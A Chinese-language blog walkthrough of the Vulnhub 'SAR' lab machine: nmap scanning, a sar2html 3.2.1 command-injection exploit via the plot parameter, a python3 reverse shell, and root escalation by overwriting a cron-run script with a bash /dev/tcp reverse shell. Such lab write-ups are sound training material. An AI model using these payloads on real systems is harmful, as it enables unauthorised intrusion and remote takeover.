SAR靶機筆記

Ling-X5發表於2024-08-17

筆記

SAR 靶機筆記

概述

SAR 是 Vulnhub 上的靶機，大家可以去 vulnhub 網站上去進行下載。

這裡有連結： https://download.vulnhub.com/sar/sar.zip

一丶常規的 nmap 掃描

1）主機發現

sn 只做 ping 掃描，不做埠掃描

nmap -sn 192.168.84.1/24

MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.84.132
Host is up (0.00041s latency).

這裡可以看到靶機 ip：192.168.84.132

2）埠掃描

sT tcp 掃描 min-rate 指定最低速率 -p- 指定全埠 -o 指定輸出路徑

nmap -sT --min-rate 10000 -p- 192.168.84.132 -o ports

Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-16 22:01 EDT
Nmap scan report for 192.168.84.132
Host is up (0.00019s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds

3）詳細資訊掃描

nmap -sT -sV -sC -p80 192.168.84.132 -o details 

Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-16 22:12 EDT
Nmap scan report for 192.168.84.132
Host is up (0.00019s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:11:2F:03 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.65 seconds

4）預設漏洞指令碼掃描

nmap --script=vuln 192.168.84.132 -o vuln     

Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-16 22:14 EDT
Nmap scan report for 192.168.84.132
Host is up (0.00018s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /robots.txt: Robots file
|_  /phpinfo.php: Possible information file
MAC Address: 00:0C:29:11:2F:03 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.80 seconds

可以看到掃描出 robots.txt、phpinfo.php 檔案

二、web 滲透

開啟主頁

看到是預設頁面

robots.txt

phpinfo.php

1）發現 cms

robots.txt 中有內容首先想到可能是目錄，訪問一下

看到就是一個 cms 的頁面，sar2HTML 我們去 searchsploit 裡面搜尋一下這個 cms，看看有沒有什麼漏洞

searchsploit sar2html

看到有兩個，版本也是一致的

searchsploit -m 47204

把 txt 的下載下來啊這兩個是都可以的喜歡用那個就用那個

cat 47204.txt 
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.

讀一下介紹還是挺詳細的，在 index.php 的頁面裡有一個 plot 引數可以命令執行。

三、獲得立足點

http://192.168.84.132/sar2HTML/index.php?plot=;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.84.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

用 python3 的反彈命令

成功獲得立足點

四、提權到 root

檢視定時任務

cat /etc/crontab

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

有一個執行 finally.sh 的命令

我們去看看這個檔案內容

cat finally.sh
#!/bin/sh

./write.sh

他執行了當前目錄下的 write.sh 檔案

我們在看看 write.sh 檔案

 cat ./write.sh
#!/bin/sh

touch /tmp/gateway

是一個建立檔案的命令

看一下許可權

我們只對 write.sh 有操作許可權，可以把他修改為一個反彈 shell 的命令，獲得 root 的 shell

我們在卡一個 kali 的終端

nc -lvp 8888

在 www-data 的命令列執行，如下命令

echo "bash -c 'bash -i >& /dev/tcp/192.168.84.128/8888 0>&1‘" >./write.sh

等待 5 分鐘

root@sar:/var/w/html# cd/rootcd/root
root@sar:~# ls 
root.txt
snap
root@sar:~#cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
root@sar:~#

成功獲取到 root 許可權

總結

先用 nmap 掃描，發現目標靶機開啟了 80 埠 http 的常規服務，並發現幾個常規的路徑
訪問 80 埠暴露出來的路徑，在 robots.txt 中發現 sar2HTML 目錄，開啟後看到一個 cms 框架
在 searchsploit 中搜走 sar2HTML 找到 RCE 漏洞
利用 RCE 漏洞獲得立足點
利用定時任務提權到了 root

BUUCTF靶機筆記
2024-03-11
筆記
BossPlayersCTF靶機筆記
2024-08-08
筆記
Headless靶機筆記
2024-08-08
筆記
Lazysysadmin靶機筆記
2024-08-10
筆記
紅日靶機（三）筆記
2024-10-04
筆記
紅日靶機(一) 筆記
2024-09-08
筆記
HTB-Permx靶機筆記
2024-08-11
筆記
紅日靶機(七)筆記
2024-11-12
筆記
Vulnhub----bulldog靶場筆記
2021-08-13
筆記
Web 靶場筆記-bWAPP
2024-11-04
Web筆記APP
知攻善防Web1應急靶機筆記--詳解
2024-08-08
Web筆記
Vulnhub DC-1靶場學習筆記
2022-01-26
筆記
靶機breakout
2024-03-09
upload-labs 靶場通關筆記
2024-10-16
筆記
記pWnOS1.0靶機滲透測試
2024-07-07
VulNyx - Ceres 靶機
2024-08-25
kali滲透綜合靶機(十一)--BSides-Vancouver靶機
2019-05-18
IDE
UA: Literally Vulnerable靶機
2021-05-16
Tiki靶機練習
2024-10-29
靶機練習：Geisha
2024-04-12
靶機練習：PhotoGrapher
2024-04-12
dc-2靶機
2024-08-06
紅隊靶機實戰（2）
2020-06-06
Vulnhub實戰-rtemis靶機?
2022-01-04
vulnstack靶機實戰01
2020-12-07
Vulnhub實戰-FALL靶機?
2021-10-22
Vulnhub實戰-doubletrouble靶機?
2021-10-11
vulnhub靶機：dc-8
2024-03-15
vulnhub靶機：djinn2
2024-03-20
vulnhub靶機：djinn3
2024-03-25
web類靶機暴力破解
2020-10-21
Web
VulnStack-紅日靶機二
2024-09-26
應急響應靶機-3
2024-03-23
應急響應靶機-4
2024-03-25
DC-3.2靶機詳解
2024-08-03
Bulldog_2 靶機提權
2024-07-10
AIX記憶體效能調優(svmon sar vmo)
2009-07-20
AI記憶體
FFmpeg開發筆記（二十二）FFmpeg中SAR與DAR的顯示寬高比
2024-05-19
筆記